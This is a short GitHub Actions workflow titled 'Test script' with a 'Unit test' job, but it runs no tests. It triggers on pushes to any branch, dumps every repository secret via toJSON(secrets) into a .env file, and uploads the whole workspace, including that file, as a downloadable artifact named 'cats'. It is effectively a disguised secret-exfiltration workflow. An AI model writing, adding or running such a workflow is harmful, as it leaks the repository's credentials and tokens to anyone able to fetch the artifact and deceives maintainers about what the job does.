name: Test script

on:
  push:
    branches:
      - "*"
  pull_request:
    branches: [main]

jobs:
  unit-tests:
    name: Unit test
    runs-on: ubuntu-20.04

    steps:
      - name: Make envfile
        uses: SpicyPizza/create-envfile@v2.0
        with:
          envkey_SECRETS: ${{ toJSON(secrets) }}
          file_name: .env
          fail_on_empty: false

      - name: Upload artifact
        uses: actions/upload-artifact@v3
        with:
          name: cats
          path: .
